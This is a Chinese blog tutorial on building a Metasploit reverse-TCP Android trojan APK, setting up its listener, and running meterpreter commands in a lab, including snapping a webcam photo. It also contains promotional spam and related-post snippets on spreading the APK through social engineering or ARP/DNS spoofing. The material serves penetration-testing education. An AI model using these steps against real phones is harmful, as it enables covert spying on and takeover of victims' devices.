网络安全新手入门—MSF渗透安卓手机(小白的第一次黑客渗透)

于 2025-07-03 10:18:37 发布
阅读量886 收藏 19
点赞数 26
CC 4.0 BY-SA版权
分类专栏: 编辑器 黑客 编程 文章标签: web安全 android 智能手机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/logic1001/article/details/149088473

    • 网络安全新手入门—MSF渗透安卓手机(小白的第一次黑客渗透)

      一、前言

      MSF,全称为Metasploit Framework,是kali中一款全球知名的开源渗透测试工具。此文章中的方法只能进行内网渗透。由于kali在虚拟机中,其显示的内网IP无法被外网的安卓手机S直接访问,所以不能直接将文章方法应用于外网。该实验为模拟环境,未经授权的渗透都是违法行为,我们都是守法的好公民。而且这种方法只能渗透安卓10以下的系统,入侵渗透更高级的系统需要更加专业的知识,再加上只能进行内网渗透,所以这种方法很难进行违法渗透!

      img

      二、演示环境

      攻击主机虚拟机 kali IP:192.168.147.129
      靶机联想模拟器 安卓9

      三、渗透过程

      (一)查询虚拟机中kali的IP

      我先在终端中输入ifconfig查询了自己虚拟机中kali的ip地址,如下图,可知ip为192.168.147.129
      在这里插入图片描述

      (二)使用root权限

      我先在终端输入su root,输入自己的密码,使用root权限,然后在此权限下进行以下操作。

      (三)生成木马

      这个木马是放在靶机上的,目的是与攻击主机进行连接,使攻击主机控制靶机,为了隐蔽,我们可以把木马软件或网站链接捆绑在一起,神不知鬼不觉地使木马靶机上运行起来,这也就是为什么尽量不要在第三方网站下载破解软件,不要随便点击不明网站的原因。这里我为了追求方便,就直接裸木马

      输入msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.147.129 LPORT=6666 R >木马.apk(这里的 LHOST换成自己kali的ip,LPORT换成一个没被占用的端口,后面的木马安装包apk的名称自定义)生成的安装包apk会默认生成在桌面的主文件夹中,并把此木马放在靶机上(在靶机上安装后软件名默认为MainActivity),先不要运行,如下图:

      在这里插入图片描述

      在这里插入图片描述

      (四)打开MSF

      我继续在终端输入msfconsole打开SF`(这里打开之后显示的图案是随机的)
      在这里插入图片描述

      (五)配置攻击载荷

      我接着在终端中输入以下命令进行配置(一条一条输入)

      use exploit/multi/handler  //选择模块
set payload android/meterpreter/reverse_tcp   //选择攻击模块
set LHOST 192.168.147.129    //与你自己kali的IP保持一致
set LPORT 6666   //与你之前设置的端口保持一致

      图片

      (六)运行

      配置完之后我输入run运行,然后双击靶机上的木马,使它在靶机上运行,出现类似如下图,则代表渗透成功:
      在这里插入图片描述

      (七)控制靶机的指令
      1、查看对方手机系统信息

      命令:sysinfo
      在这里插入图片描述

      2、查看对方手机安装哪些app文件

      命令:app_list
      在这里插入图片描述

      3、控制摄像头拍摄一张照片

      注意:要先给虚拟机摄像头权限,安装上相机,有前置摄像头开关的电脑要打开它
      命令:webcam_snap(也是成功拍到了我的键盘)
      在这里插入图片描述

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。

内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要见下图即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

本文转自 https://blog.youkuaiyun.com/bdfcfff77fa/article/details/149087193?spm=1001.2014.3001.5502,如有侵权,请联系删除。

网络安全MSF内网渗透
你在看屏幕的同时,屏幕也在注视着你
06-04 3161
内网渗透超级强悍
MSF渗透Android
Yxisobai的博客
05-28 1652
kali linux 云服务器,云服务器安装kali linux网络软件不要乱下载,自己做测试的时候没做免杀手机能监测出病毒,但是被有心之人利用,通过捆绑,免杀等一系列操作,还是很难发现的。特别注意一下外挂等软件,xx助手等软件。
使用msf工具对安卓手机进行渗透攻击———超详细
热门推荐
weixin_71669458的博客
07-28 2万+
1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。
msf渗透安卓
weixin_30872499的博客
05-29 643
/*metasploit之远控*/msfconsole //开启metasploit模块/*根据自己的IP生成一个木马*/msfvenom -p 系统/meterpreter/reverse_tcp LHOST=IP LPORT = 端口 R> 文件名.exe(安卓.apk) use expolit/multi/handler //开启模块 show options //查看参数设置...
MSF渗透测试android手机
永远是少年
06-15 5375
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF渗透测试android手机。 一、Android木马生成 二、Android木马安装 三、效果检验
Kali利用MSF渗透安卓手机_kali入侵安卓手机
2401_87034253的博客
09-11 1798
MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 1921
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
网络安全基于Metasploit Framework的后渗透测试技术:利用MSF进行木马生成与持久化控制
05-09
内容概要:本文详细介绍了Metasploit Framework(MSF)这款由Rapid7公司维护的开源渗透测试框架,旨在提升用户的安全意识,防范因点击不安全应用而导致的信息泄露。文中讲解了MSF中exploit、payload、auxiliary、post...
网络安全Meterpreter核心命令详解:涵盖文件系统、网络、系统及用户界面操作的渗透测试工具使用指南
04-06
适合人群:熟悉渗透测试工具 Metasploit Framework (MSF) 并希望深入了解 Meterpreter 功能的安全研究人员、红队成员、网络安全专家等。 使用场景及目标:①在渗透测试过程中,利用 Meterpreter 提供的强大功能对...
渗透测试】利用MSF入侵安卓手机
最新发布
yy1715713348的博客
07-03 964
准备一个废弃的安卓手机,建议买小米系列,通过MSF生成APK文件植入安卓手机,而渗透入手机,查看相关信息**”**01工具msfvenom、msfconsole(Kali系统内置)02 渗透sudo -i*****命令:*实例:*****运行上述命令后生成****上述总共6个步骤,在运行第6个步骤之前,请在手机端安装这个APK文件最后出现meterpreter,表示成功。4.meterpreter常用指令对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
MSF模拟渗透测试之攻击Android
lza20001103的博客
04-09 7351
MSF渗透测试系列之攻击Android
MSF入侵安卓手机
2201_75719295的博客
05-18 5802
里边安装了许许多多的工具。其中MSF就自带有。MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试。
MSF和永恒之蓝&渗透安卓手机
niqiu320的博客
04-23 2436
Metasploit简介 Metasploit框架是一个开源的渗透工具,它是由Ruby语言编写的模块化框架,具有良好的扩展性,通过它可以轻易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 它提供了多个基本的用户接口,包括终端、命令行、图形化等,一般我们使用较多的是终端MSF和图形化的Armitage 它分为社区版和商业版 qpt-get update apt-get install metasploit-framework MSF框架是由多个模块组成的,具体的模块
手机没Root?你照样可以渗透路由器
weixin_34191734的博客
08-15 1124
和Metasploit差不多,RouterSploit是一个强大的漏洞利用框架,用于快速识别和利用路由器中的普通漏洞,它还有个亮点,就是可以在绝大多数安卓设备上运行。 如果你想在电脑上运行,可以阅读这篇文章,而这篇教程则会告诉你如何轻松地在未Root的安卓设备上安装RouterSploit,这样一来,只要你的智能手机可以连接这些有漏洞的路由器,你就可以渗透他们。 RouterSploit vs 路...
【App渗透】用BurpSuite抓包安卓手机app内容,温故而知新
2401_84247760的博客
04-10 743
很多情况下,在电脑的手机模拟器上面做app测试会存在大大小小的bug或者各种坑,而且有些模拟器很不方便,非常不好用。网上的教程虽然多,但是大部分都是两年前的甚至更晚的,跟着一步步来也是会错。为了避免这种情况的发生,所以有了这篇文章。在本机上面做app渗透,才是最稳定的。当然,我检测的app都是公司的产品,如果是你们要测一个不知情的app,还是建议杀杀毒,或者另外某🐟上面买一台二手的安卓机,非常便宜,几百块的手机到处都有,反正就是做个app测试,专门给自己买个测试机或者拿来搞安卓逆向都是很香的。
msf渗透手机(操作手机系统)
xss2001999的博客
11-09 661
msf渗透智能手机安卓系统)
黑客养成计划-熟悉MSF并拿下一部android
小司机的奥拓
05-06 781
本文仅用于学习和技术探讨,不作为任何恶意行为能力传播,本质上,只是想让大家学习了解MSF。Metasploit Framework (MSF)是目前所能接触到的软件渗透测试工具中最知名的工具,包括数千个工具和模块,可用于探索和利用漏洞、执行调查、测试和工具/有效负载创建等,对攻击者、防御者来说都是爱恨交加。三个版本.
利用metasploit对手机进行渗透实战
qq_52907838的博客
08-18 3469
第一步:用ifconfig命令查看本机ip地址 第二步:用msfvenom -p命令生成apk木马文件 具体命令为 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.101.7 lport=8848 R > /home/kali/桌面/muma.apk 说明:lhost后面的IP地址为刚刚查到的本机IP(这里也可以不用本机IP),lport后面为自己规定的端口号,我规定的为8848,R为指定文件格式,后面接生成apk的
Kali利用MSF渗透安卓手机
03-13
### 使用 Kali Linux 和 Metasploit Framework 对 Android 设备进行渗透测试 #### 准备工作 为了确保环境配置正确,在开始之前需更新和升级 Kali Linux 的包管理器以及安装最新版本的 Metasploit Framework[^1]。 ```bash apt update && apt upgrade -y apt install metasploit-framework -y ``` #### 启动 Metasploit Framework 通过 `msfconsole` 命令可以启动 Metasploit Framework 并进入其交互式命令行界面。这一步骤对于后续操作至关重要,因为所有的渗透测试活动都将在此环境中执行[^2]。 ```bash msfconsole ``` #### 配置监听模块 针对 Android 设备的渗透测试通常涉及使用特定的有效载荷(payload)。下面是一个常见的有效载荷设置过程: - **选择多平台反向 TCP Shell** ```ruby use exploit/multi/handler set payload android/meterpreter/reverse_tcp ``` - **设定 LHOST 参数** 这里需要指定本地 IP 地址作为回调地址,即攻击者机器上的 IP 地址。 ```ruby set LHOST <Your_Kali_IP_Address> ``` - **设定 LPORT 参数** 设置用于接收连接请求的端口号,默认情况下可以选择 4444 或其他未被占用的端口。 ```ruby set LPORT 4444 ``` - **开启监听** 执行此指令后,Metasploit 将等待来自目标设备的连接尝试。 ```ruby exploit -j -z ``` #### 创建恶意 APK 文件 为了让 Android 用户下载并运行含有恶意代码的应用程序,可利用 msfvenom 工具生成带有自定义图标和名称的 APK 文件。 ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your_Kali_IP_Address> LPORT=4444 R > malicious.apk ``` #### 社会工程学手段传播恶意应用 将生成好的 APK 发送给潜在受害者或者上传到不受信任的应用商店让对方自行下载安装。请注意这种行为仅限于合法授权范围内的安全评估活动中。 #### 获取 Meterpreter Session 一旦受害者的手机成功安装并打开了该应用程序,则会在 Metasploit 控制台中看到一个新的 session 被创建出来。此时便可以获得对受感染系统的完全控制权限。 ```ruby sessions -i <Session_ID> ``` #### 实施进一步行动 有了 meterpreter shell 访问权之后就可以开展更多深入调查动作比如提取敏感数据、提权等高级技巧。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值